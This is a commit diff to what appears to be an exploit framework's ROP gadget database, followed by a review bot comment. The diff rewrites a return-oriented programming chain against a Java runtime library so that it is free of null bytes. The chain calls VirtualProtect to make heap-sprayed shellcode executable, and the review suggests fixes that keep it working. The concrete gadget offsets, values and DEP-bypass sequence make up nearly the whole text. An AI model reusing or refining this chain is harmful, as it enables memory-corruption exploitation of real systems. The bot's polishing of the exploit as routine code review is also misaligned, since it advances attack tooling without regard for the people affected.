Commit ea4c88b

Java Rop null-byte free
Our new heap spray routine does not like double nulls, so we need to adjust our ROP.
1 parent afcbaff commit ea4c88b

1 file changed

+21
-15
lines changed

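--- a/data/ropdb/java.xml
+++ b/data/ropdb/java.xml
@@ -6,22 +6,28 @@
 </compatibility>
 
 <gadgets base="0x7c340000">
-<gadget offset="0x0000252c">POP EBP # RETN</gadget>
-<gadget offset="0x0000252c">skip 4 bytes</gadget>
-<gadget offset="0x0002c55a">POP EBX # RETN</gadget>
-<gadget value="0x00000400">0x00000400-> ebx</gadget>
-<gadget offset="0x00005249">POP EDX # RETN</gadget>
-<gadget value="0x00000040">0x00000040-> edx</gadget>
-<gadget offset="0x000011c0">POP ECX # RETN</gadget>
-<gadget offset="0x00051897">Writable location</gadget>
-<gadget offset="0x0000b8d7">POP EDI # RETN</gadget>
-<gadget offset="0x00006c0b">RETN (ROP NOP)</gadget>
-<gadget offset="0x00026fa6">POP ESI # RETN</gadget>
+<gadget offset="0x00024c66">POP EBP # RETN</gadget>
+<gadget offset="0x00024c66">skip 4 bytes</gadget>
+<gadget offset="0x00004edc">POP EAX # RETN</gadget>
+<gadget value="0xfffffdff">0x00000201</gadget>
+<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
+<gadget offset="0x000136e3">POP EBX # RETN</gadget>
+<gadget value="0xffffffff"></gadget>
+<gadget offset="0x00005255">INC EBX # FPATAN # RETN</gadget>
+<gadget offset="0x0001218e">ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN</gadget>
+<gadget offset="0x00005937">POP EDX # RETN</gadget>
+<gadget value="0xffffffc0">0x00000040</gadget>
+<gadget offset="0x00011eb1">NEG EDX # RETN</gadget>
+<gadget offset="0x0002c5b9">POP ECX # RETN</gadget>
+<gadget offset="0x00051e67">Writable location</gadget>
+<gadget offset="0x00002e58">POP EDI # RETN</gadget>
+<gadget offset="0x0000d202">RETN (ROP NOP)</gadget>
+<gadget offset="0x0000f8f4">POP ESI # RETN</gadget>
 <gadget offset="0x000015a2">JMP [EAX]</gadget>
-<gadget offset="0x000362fb">POP EAX # RETN</gadget>
-<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
-<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
-<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
+<gadget offset="0x00004edc">POP EAX # RETN</gadget>
+<gadget offset="0x0003a140">ptr to VirtualProtect()</gadget>
+<gadget offset="0x00038c81">,PUSHAD # ADD AL,0EF # RETN</gadget>
+<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
 </gadgets>
 </rop>
 </db>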
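Review bot: The rewritten `PUSHAD # ADD AL,0EF # RETN` entry at offset 0x00038c81 now carries a stray leading comma in its description (`,PUSHAD …`); it should read `<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>` so it matches its siblings and anything that matches on the description text. The chain also quietly changes the dwSize handed to VirtualProtect: EBX used to be 0x400 and is now 0 + NEG(0xfffffdff) = 0x201, which the commit message does not mention and which only matters if the sprayed shellcode extends past the page boundary that 0x400 would have covered — worth confirming it is intentional. The `<gadget value="0xffffffff">` entry has an empty description while the neighbouring value entries state the resulting register contents; `<gadget value="0xffffffff">-1 -> ebx, INC'd to 0 by the next gadget</gadget>` would make the null-free zeroing trick readable. Finally, the null-free requirement lives only in the commit message: an XML comment on `<gadgets>`, e.g. `<!-- every base+offset and every value must contain no 0x00 byte: the heap spray cannot carry nulls -->`, would keep a future gadget swap from reintroducing one; the enclosing `<rop>`/`<db>` elements open outside this hunk.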
